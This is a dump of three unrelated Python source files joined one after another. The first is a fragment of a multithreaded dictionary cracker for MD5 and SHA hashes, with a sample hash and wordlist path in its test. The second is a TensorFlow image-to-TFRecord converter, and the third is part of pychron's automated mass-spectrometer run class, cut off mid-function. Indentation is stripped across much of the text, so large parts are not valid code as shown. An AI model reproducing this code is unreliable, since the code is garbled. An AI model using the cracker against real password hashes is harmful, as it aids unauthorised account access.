threadchecker = threading.Thread(target=self._ThreadChecker)
threadchecker.setDaemon(True)
threadchecker.start()
        # Map each supported mode to its worker thread target; one scheduling
        # loop replaces six duplicated copies of the same logic.
        workers = {'md5': self._Md5HashCracker,
                   'sha1': self._Sha1HashCracker,
                   'sha224': self._Sha224HashCracker,
                   'sha256': self._Sha256HashCracker,
                   'sha384': self._Sha384HashCracker,
                   'sha512': self._Sha512HashCracker}
        if self.mode in workers:
            worker = workers[self.mode]
            while len(self.TaskList) or self.Queue.qsize():
                if len(self.TaskList) < self.Thread:
                    thread = threading.Thread(target=worker, args=[self.Queue.get()])
                    thread.start()
                    self.TaskList.append(thread)
                if not self.Queue.qsize():
                    print '[*] Scan completed, synchronizing threads.'
                    for item in self.TaskList:
                        item.join()
                    break
        else:
            print '[!] Invalid hash type. Supported types: md5, sha1|224|256|384|512.'
self.Status = False
if self.PlainText:
print '[+] Password found: %s' % (self.PlainText)
return self.PlainText
else:
print '[*] Hash not found.'
return
def _Md5HashCracker(self, plaintext):
print '[*] Checking %s' %(plaintext)
if hashlib.md5(plaintext).hexdigest() == self.Hash:
self.Status = False
self.PlainText = plaintext
return
def _Sha1HashCracker(self, plaintext):
print '[*] Checking %s' %(plaintext)
if hashlib.sha1(plaintext).hexdigest() == self.Hash:
self.Status = False
self.PlainText = plaintext
return
def _Sha224HashCracker(self, plaintext):
print '[*] Checking %s' %(plaintext)
if hashlib.sha224(plaintext).hexdigest() == self.Hash:
self.Status = False
self.PlainText = plaintext
return
def _Sha256HashCracker(self, plaintext):
print '[*] Checking %s' %(plaintext)
if hashlib.sha256(plaintext).hexdigest() == self.Hash:
self.Status = False
self.PlainText = plaintext
return
def _Sha384HashCracker(self, plaintext):
print '[*] Checking %s' %(plaintext)
if hashlib.sha384(plaintext).hexdigest() == self.Hash:
self.Status = False
self.PlainText = plaintext
return
def _Sha512HashCracker(self, plaintext):
print '[*] Checking %s' %(plaintext)
if hashlib.sha512(plaintext).hexdigest() == self.Hash:
self.Status = False
self.PlainText = plaintext
return
    def _ThreadChecker(self):
        time.sleep(1)
        while self.Status:
            # Iterate over a copy: removing items from the list being iterated
            # skips elements.
            for item in self.TaskList[:]:
                if not item.isAlive():
                    self.TaskList.remove(item)
                    del item
            time.sleep(0.1)  # avoid busy-spinning between sweeps
        return
def GetPlaintext(self, mode, digit): # todo: list generation
list = []
CharList = ['a', 'b', 'c', 'd', 'e' ,'f', 'g', 'h', 'i' ,'j', 'k', 'l' ,'m', 'n', 'o' ,'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
NumList = [1,2,3,4,5,6,7,8,9,10]
if mode == 'a-z':
for i in range(digit):
for i in CharList:
pass
def info(self):
InformationList = info()
args = InformationList['parameters']
print '[*] Incoming scanner information:'
print '[*] Scanner name: %s' %(InformationList['name'])
print ' | %s' %(InformationList['fullname'])
print ' | Description: %s' %(InformationList['description'])
print ' | Author: %s' %(InformationList['author'])
print ' | Date: %s' %(InformationList['date'])
print ' | Arguments: Total %i' %(len(args))
        print ' | | NAME        DESCRIPTION'
        print ' | | ----        -----------'
for item in args.keys():
print ' | | %s%s' %(item.ljust(12), args[item])
print ' |'
print '[*] Scanner information end.'
def test():
scanner = Scanner()
scanner.Hash = '42995f342e8abd019311aaed89d550ae'
scanner.mode = 'md5'
scanner.FileName = '/home/nimda/swep/WordLists/TestDict'
scanner.CrackHash()
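# test() doubles as a usage example: set Hash, mode and FileName on a Scanner,
# then call CrackHash(). The hash and wordlist path above are sample values.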
|
build_image_data.py | """Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
  image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If your data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', 'D:\\Robots\\Fruit-Images-Dataset\\Training',
'Training data directory')
tf.app.flags.DEFINE_string('test_directory', 'D:\\Robots\\Fruit-Images-Dataset\\Test',
'Test data directory')
tf.app.flags.DEFINE_string('output_directory', 'D:\\Robots\\',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('test_shards', 1,
'Number of shards in test TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 1,
'Number of threads to preprocess the images.')
# The labels file contains the list of valid labels.
# Assumes that the file contains entries as such:
# dog
# cat
# flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to its line number, starting from 1
# (index 0 is reserved as the background class).
tf.app.flags.DEFINE_string('labels_file', './labels', 'Labels file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'height': _int64_feature(height),
'width': _int64_feature(width),
'label': _int64_feature(label),
'image_raw': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
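# A minimal read-back sketch (hypothetical helper, not part of the original
# pipeline): it parses one serialized Example written by _convert_to_example
# above, using the same feature keys ('height', 'width', 'label', 'image_raw').
# Assumes the TF 1.x API used throughout this script.
def _example_read_one_record(tfrecord_path):
  """Return (height, width, label, image_raw) from the first record."""
  for serialized in tf.python_io.tf_record_iterator(tfrecord_path):
    example = tf.train.Example()
    example.ParseFromString(serialized)
    feat = example.features.feature
    return (feat['height'].int64_list.value[0],
            feat['width'].int64_list.value[0],
            feat['label'].int64_list.value[0],
            feat['image_raw'].bytes_list.value[0])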
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return filename.endswith('.png')
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
  # Convert any PNGs to JPEGs for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
    thread_index: integer, unique batch index within [0, len(ranges)).
    ranges: list of pairs of integers specifying the ranges of each batch to
      analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
image_buffer, height, width = _process_image(filename, coder)
except Exception as e:
print(e)
print('SKIPPED: Unexpected error while decoding %s.' % filename)
continue
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
  # Break all images into batches given by [ranges[i][0], ranges[i][1]).
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
      print('Finished finding files in %d of %d classes.' % (
          label_index, len(unique_labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.test_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.test_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
  _process_dataset('test', FLAGS.test_directory,
FLAGS.test_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory,
FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
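# Example invocation (hypothetical paths; the flags default to the D:\Robots
# locations defined above):
#   python build_image_data.py --train_directory=/data/Training \
#       --test_directory=/data/Test --output_directory=/data/records \
#       --labels_file=./labels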
|
automated_run.py | # ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# # ============= enthought library imports =======================
import ast
import os
import re
import time
import weakref
from pprint import pformat
from threading import Thread, Event as TEvent
from numpy import Inf, polyfit, linspace, polyval
from traits.api import Any, Str, List, Property, \
Event, Instance, Bool, HasTraits, Float, Int, Long, Tuple, Dict
from traits.trait_errors import TraitError
from pychron.core.helpers.filetools import add_extension
from pychron.core.helpers.filetools import get_path
from pychron.core.helpers.iterfuncs import groupby_key
from pychron.core.helpers.strtools import to_bool
from pychron.core.ui.preference_binding import set_preference
from pychron.core.yaml import yload
from pychron.experiment import ExtractionException
from pychron.experiment.automated_run.hop_util import parse_hops
from pychron.experiment.automated_run.persistence_spec import PersistenceSpec
from pychron.experiment.conditional.conditional import TruncationConditional, \
ActionConditional, TerminationConditional, conditional_from_dict, CancelationConditional, conditionals_from_file, \
QueueModificationConditional
from pychron.experiment.utilities.conditionals import test_queue_conditionals_name, QUEUE, SYSTEM, RUN
from pychron.experiment.utilities.environmentals import set_environmentals
from pychron.experiment.utilities.identifier import convert_identifier
from pychron.experiment.utilities.script import assemble_script_blob
from pychron.globals import globalv
from pychron.loggable import Loggable
from pychron.paths import paths
from pychron.pychron_constants import NULL_STR, MEASUREMENT_COLOR, \
EXTRACTION_COLOR, SCRIPT_KEYS, AR_AR, NO_BLANK_CORRECT, EXTRACTION, MEASUREMENT, EM_SCRIPT_KEYS, SCRIPT_NAMES, \
POST_MEASUREMENT, POST_EQUILIBRATION
from pychron.spectrometer.base_spectrometer import NoIntensityChange
DEBUG = False
class ScriptInfo(HasTraits):
measurement_script_name = Str
extraction_script_name = Str
post_measurement_script_name = Str
post_equilibration_script_name = Str
SCRIPTS = {}
WARNED_SCRIPTS = []
class AutomatedRun(Loggable):
"""
The ``AutomatedRun`` object is used to execute automated analyses.
    It mostly delegates responsibility to other objects.
It provides an interface for ``MeasurementPyscripts``.
All measurement script commands have a corresponding function defined here.
    A command's corresponding function is defined as py_{function_name};
    for example, ``position_magnet`` calls ``AutomatedRun.py_position_magnet``
data collection is handled by either ``MultiCollector`` or ``PeakHopCollector``
persistence (saving to file and database) is handled by ``AutomatedRunPersister``
An automated run is executed in four steps by the ``ExperimentExecutor``.
#. start
#. extraction
#. measurement
a. equilibration
b. post_equilibration
#. post_measurement
    equilibration and post_equilibration are executed concurrently with the
    measurement script; this way the equilibration gas can be measured.
four pyscripts (all optional) are used to program analysis execution
1. extraction
2. measurement
3. post_equilibration
4. post_measurement
four types of conditionals are available
1. termination_conditionals
2. truncation_conditionals
3. action_conditionals
4. cancelation_conditionals
"""
spectrometer_manager = Any
extraction_line_manager = Any
# experiment_executor = Any
ion_optics_manager = Any
multi_collector = Instance('pychron.experiment.automated_run.multi_collector.MultiCollector')
peak_hop_collector = Instance('pychron.experiment.automated_run.peak_hop_collector.PeakHopCollector')
persister = Instance('pychron.experiment.automated_run.persistence.AutomatedRunPersister', ())
dvc_persister = Instance('pychron.dvc.dvc_persister.DVCPersister')
labspy_client = Instance('pychron.labspy.client.LabspyClient')
xls_persister = Instance('pychron.experiment.automated_run.persistence.ExcelPersister')
collector = Property
script_info = Instance(ScriptInfo, ())
runner = Any
monitor = Any
plot_panel = Any
isotope_group = Instance('pychron.processing.isotope_group.IsotopeGroup')
spec = Any
runid = Str
uuid = Str
analysis_id = Long
fits = List
eqtime = Float
use_syn_extraction = Bool(False)
is_first = Bool(False)
is_last = Bool(False)
is_peak_hop = Bool(False)
truncated = Bool
measuring = Bool(False)
dirty = Bool(False)
update = Event
use_db_persistence = Bool(True)
use_dvc_persistence = Bool(False)
use_xls_persistence = Bool(False)
measurement_script = Instance('pychron.pyscripts.measurement_pyscript.MeasurementPyScript')
post_measurement_script = Instance('pychron.pyscripts.extraction_line_pyscript.ExtractionPyScript')
post_equilibration_script = Instance('pychron.pyscripts.extraction_line_pyscript.ExtractionPyScript')
extraction_script = Instance('pychron.pyscripts.extraction_line_pyscript.ExtractionPyScript')
termination_conditionals = List
truncation_conditionals = List
action_conditionals = List
cancelation_conditionals = List
modification_conditionals = List
tripped_conditional = Instance('pychron.experiment.conditional.conditional.BaseConditional')
peak_center = None
coincidence_scan = None
info_color = None
signal_color = None
baseline_color = None
executor_event = Event
ms_pumptime_start = None
previous_blanks = Tuple
previous_baselines = Dict
_active_detectors = List
_peak_center_detectors = List
_loaded = False
_measured = False
_aborted = False
_alive = Bool(False)
_truncate_signal = Bool
_equilibration_done = False
_integration_seconds = Float(1.1)
min_ms_pumptime = Int(60)
overlap_evt = None
use_peak_center_threshold = Bool
peak_center_threshold = Float(3)
peak_center_threshold_window = Int(10)
persistence_spec = Instance(PersistenceSpec)
experiment_type = Str(AR_AR)
laboratory = Str
instrument_name = Str
intensity_scalar = Float
_intensities = None
log_path = Str
failed_intensity_count_threshold = Int(3)
use_equilibration_analysis = Bool(False)
def set_preferences(self, preferences):
self.debug('set preferences')
for attr, cast in (('experiment_type', str),
('laboratory', str),
('instrument_name', str),
('use_equilibration_analysis', to_bool),
('use_peak_center_threshold', to_bool),
('peak_center_threshold', float),
('peak_center_threshold_window', int),
('failed_intensity_count_threshold', int)):
set_preference(preferences, self, attr, 'pychron.experiment.{}'.format(attr), cast)
for p in (self.persister, self.xls_persister, self.dvc_persister):
if p is not None:
p.set_preferences(preferences)
self.multi_collector.console_set_preferences(preferences, 'pychron.experiment')
self.peak_hop_collector.console_set_preferences(preferences, 'pychron.experiment')
# ===============================================================================
# pyscript interface
# ===============================================================================
def py_get_intensity(self, detector):
if self._intensities:
try:
idx = self._intensities['tags'].index(detector)
except ValueError:
return
return self._intensities['signals'][idx]
def py_set_intensity_scalar(self, v):
self.intensity_scalar = v
return True
def py_set_isotope_group(self, name):
if self.plot_panel:
self.plot_panel.add_isotope_graph(name)
def py_generate_ic_mftable(self, detectors, refiso, peak_center_config=None, n=1):
return self._generate_ic_mftable(detectors, refiso, peak_center_config, n)
def py_whiff(self, ncounts, conditionals, starttime, starttime_offset, series=0, fit_series=0):
return self._whiff(ncounts, conditionals, starttime, starttime_offset, series, fit_series)
def py_reset_data(self):
self.debug('reset data')
self._persister_action('pre_measurement_save')
def py_send_spectrometer_configuration(self):
self.spectrometer_manager.spectrometer.send_configuration()
self.spectrometer_manager.spectrometer.clear_cached_config()
def py_reload_mftable(self):
self.spectrometer_manager.spectrometer.reload_mftable()
def py_set_integration_time(self, v):
self.set_integration_time(v)
def py_is_last_run(self):
return self.is_last
def py_define_detectors(self, isotope, det):
self._define_detectors(isotope, det)
def py_position_hv(self, pos, detector):
self._set_hv_position(pos, detector)
def py_position_magnet(self, pos, detector, use_dac=False, for_collection=True):
if not self._alive:
return
self._set_magnet_position(pos, detector, use_dac=use_dac, for_collection=for_collection)
def py_activate_detectors(self, dets, peak_center=False):
if not self._alive:
return
if not self.spectrometer_manager:
self.warning('no spectrometer manager')
return
if peak_center:
self._peak_center_detectors = self._set_active_detectors(dets)
else:
self._activate_detectors(dets)
def py_set_fits(self, fits):
isotopes = self.isotope_group.isotopes
if not fits:
fits = self._get_default_fits()
elif len(fits) == 1:
            fits = {i: fits[0] for i in isotopes}
else:
fits = dict([f.split(':') for f in fits])
g = self.plot_panel.isotope_graph
for k, iso in isotopes.items():
try:
fi = fits[k]
except KeyError:
try:
fi = fits[iso.name]
except KeyError:
try:
fi = fits['{}{}'.format(iso.name, iso.detector)]
except KeyError:
fi = 'linear'
self.warning('No fit for "{}". defaulting to {}. '
'check the measurement script "{}"'.format(k, fi, self.measurement_script.name))
iso.set_fit_blocks(fi)
self.debug('set "{}" to "{}"'.format(k, fi))
idx = self._get_plot_id_by_ytitle(g, k, iso)
if idx is not None:
g.set_regressor(iso.regressor, idx)
def py_set_baseline_fits(self, fits):
if not fits:
fits = self._get_default_fits(is_baseline=True)
elif len(fits) == 1:
fits = {i.detector: fits[0] for i in self.isotope_group.values()}
elif isinstance(fits, str):
fits = {i.detector: fits for i in self.isotope_group.values()}
else:
fits = dict([f.split(':') for f in fits])
for k, iso in self.isotope_group.items():
try:
fi = fits[iso.detector]
except KeyError:
fi = ('average', 'SEM')
self.warning('No fit for "{}". defaulting to {}. '
'check the measurement script "{}"'.format(iso.detector, fi, self.measurement_script.name))
iso.baseline.set_fit_blocks(fi)
self.debug('set "{}" to "{}"'.format(iso.detector, fi))
def py_get_spectrometer_parameter(self, name):
self.info('getting spectrometer parameter {}'.format(name))
if self.spectrometer_manager:
return self.spectrometer_manager.spectrometer.get_parameter(name)
def py_set_spectrometer_parameter(self, name, v):
self.info('setting spectrometer parameter {} {}'.format(name, v))
if self.spectrometer_manager:
self.spectrometer_manager.spectrometer.set_parameter(name, v)
def py_raw_spectrometer_command(self, cmd):
if self.spectrometer_manager:
self.spectrometer_manager.spectrometer.ask(cmd)
def py_data_collection(self, obj, ncounts, starttime, starttime_offset, series=0, fit_series=0, group='signal',
integration_time=None):
if not self._alive:
return
if self.plot_panel:
self.plot_panel.is_baseline = False
self.plot_panel.show_isotope_graph()
self.persister.build_tables(group, self._active_detectors, ncounts)
self.multi_collector.is_baseline = False
self.multi_collector.fit_series_idx = fit_series
check_conditionals = obj == self.measurement_script
if integration_time:
self.set_integration_time(integration_time)
result = self._measure(group,
self.persister.get_data_writer(group),
ncounts, starttime, starttime_offset,
series,
check_conditionals, self.signal_color, obj)
return result
def py_post_equilibration(self, **kw):
self.do_post_equilibration(**kw)
def py_equilibration(self, eqtime=None, inlet=None, outlet=None,
do_post_equilibration=True,
close_inlet=True,
delay=None):
evt = TEvent()
if not self._alive:
evt.set()
return evt
self.heading('Equilibration Started')
t = Thread(name='equilibration', target=self._equilibrate, args=(evt,),
kwargs=dict(eqtime=eqtime,
inlet=inlet,
outlet=outlet,
delay=delay,
close_inlet=close_inlet,
do_post_equilibration=do_post_equilibration))
t.setDaemon(True)
t.start()
return evt
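    # Hypothetical usage sketch: a caller that needs to block until the
    # equilibration thread signals the returned event could do
    #     evt = run.py_equilibration(eqtime=20)
    #     evt.wait()
    # (the event is assumed to be set by _equilibrate when it finishes).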
def py_sniff(self, ncounts, starttime, starttime_offset, series=0, block=True):
if block:
return self._sniff(ncounts, starttime, starttime_offset, series)
else:
t = Thread(target=self._sniff,
name='sniff',
args=(ncounts, starttime, starttime_offset, series))
t.setDaemon(True)
t.start()
return True
def py_baselines(self, ncounts, starttime, starttime_offset, mass, detector,
series=0, fit_series=0, settling_time=4, integration_time=None, use_dac=False):
if not self._alive:
return
gn = 'baseline'
self.debug('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Baseline')
self.persister.build_tables(gn, self._active_detectors, ncounts)
ion = self.ion_optics_manager
if mass:
if ion is not None:
if detector is None:
detector = self._active_detectors[0].name
ion.position(mass, detector, use_dac=use_dac)
msg = 'Delaying {}s for detectors to settle'.format(settling_time)
self.info(msg)
if self.plot_panel:
self.plot_panel.total_counts += settling_time
self.plot_panel.total_seconds += settling_time
self.wait(settling_time, msg)
if self.plot_panel:
# self.plot_panel.set_ncounts(ncounts)
self.plot_panel.is_baseline = True
self.plot_panel.show_baseline_graph()
self.multi_collector.is_baseline = True
self.multi_collector.fit_series_idx = fit_series
check_conditionals = True
self.collector.for_peak_hop = self.plot_panel.is_peak_hop
self.plot_panel.is_peak_hop = False
if integration_time:
self.set_integration_time(integration_time)
result = self._measure(gn,
self.persister.get_data_writer(gn),
ncounts, starttime,
starttime_offset,
series,
check_conditionals, self.baseline_color)
if self.plot_panel:
bs = dict([(iso.name, (iso.detector, iso.baseline.uvalue)) for iso in
self.isotope_group.values()])
# self.set_previous_baselines(bs)
self.executor_event = {'kind': 'baselines', 'baselines': bs}
self.plot_panel.is_baseline = False
self.multi_collector.is_baseline = False
return result
def py_define_hops(self, hopstr):
"""
set the detector each isotope
add additional isotopes and associated plots if necessary
"""
if self.plot_panel is None:
self.plot_panel = self._new_plot_panel(self.plot_panel, stack_order='top_to_bottom')
self.plot_panel.is_peak_hop = True
a = self.isotope_group
g = self.plot_panel.isotope_graph
g.clear()
self.measurement_script.reset_series()
hops = parse_hops(hopstr, ret='iso,det,is_baseline')
for iso, det, is_baseline in hops:
if is_baseline:
continue
name = iso
if name in a.isotopes:
ii = a.isotopes[name]
if ii.detector != det:
name = '{}{}'.format(iso, det)
ii = a.isotope_factory(name=iso, detector=det)
else:
ii = a.isotope_factory(name=name, detector=det)
pid = self._get_plot_id_by_ytitle(g, name)
if pid is None:
plot = self.plot_panel.new_isotope_plot()
pid = g.plots.index(plot)
else:
plot = g.plots[pid]
plot.y_axis.title = name
g.set_regressor(ii.regressor, pid)
a.isotopes[name] = ii
self._load_previous()
self.plot_panel.analysis_view.load(self)
# map_mass = self.spectrometer_manager.spectrometer.map_mass
# hops = [(map_mass(hi[0]),) + tuple(hi) for hi in hops]
#
# for mass, dets in groupby_key(hops, key=itemgetter(0), reverse=True):
# dets = list(dets)
# iso = dets[0][1]
# if dets[0][3]:
# continue
#
# for _, _, di, _ in dets:
# self._add_active_detector(di)
# name = iso
# if iso in a.isotopes:
# ii = a.isotopes[iso]
# if ii.detector != di:
# name = '{}{}'.format(iso, di)
# ii = a.isotope_factory(name=name, detector=di)
# else:
# ii = a.isotope_factory(name=iso, detector=di)
#
# pid = self._get_plot_id_by_ytitle(g, ii, di)
# if pid is None:
# plots = self.plot_panel.new_isotope_plot()
# plot = plots['isotope']
# pid = g.plots.index(plot)
#
        # # this line causes an issue when trying to plot the sniff on the isotope graph
# # g.new_series(type='scatter', fit='linear', plotid=pid)
#
# g.set_regressor(ii.regressor, pid)
# a.isotopes[name] = ii
# plot.y_axis.title = name
#
# self._load_previous()
#
# self.plot_panel.analysis_view.load(self)
def py_peak_hop(self, cycles, counts, hops, mftable, starttime, starttime_offset, series=0, fit_series=0,
group='signal'):
if not self._alive:
return
with self.ion_optics_manager.mftable_ctx(mftable):
is_baseline = False
self.peak_hop_collector.is_baseline = is_baseline
self.peak_hop_collector.fit_series_idx = fit_series
if self.plot_panel:
self.plot_panel.trait_set(is_baseline=is_baseline, _ncycles=cycles, hops=hops)
self.plot_panel.show_isotope_graph()
# required for mass spec
self.persister.save_as_peak_hop = True
self.is_peak_hop = True
check_conditionals = True
self._add_conditionals()
ret = self._peak_hop(cycles, counts, hops, group,
starttime, starttime_offset, series,
check_conditionals)
self.is_peak_hop = False
return ret
def py_peak_center(self, detector=None, save=True, isotope=None,
directions='Increase', config_name='default',
check_intensity=None,
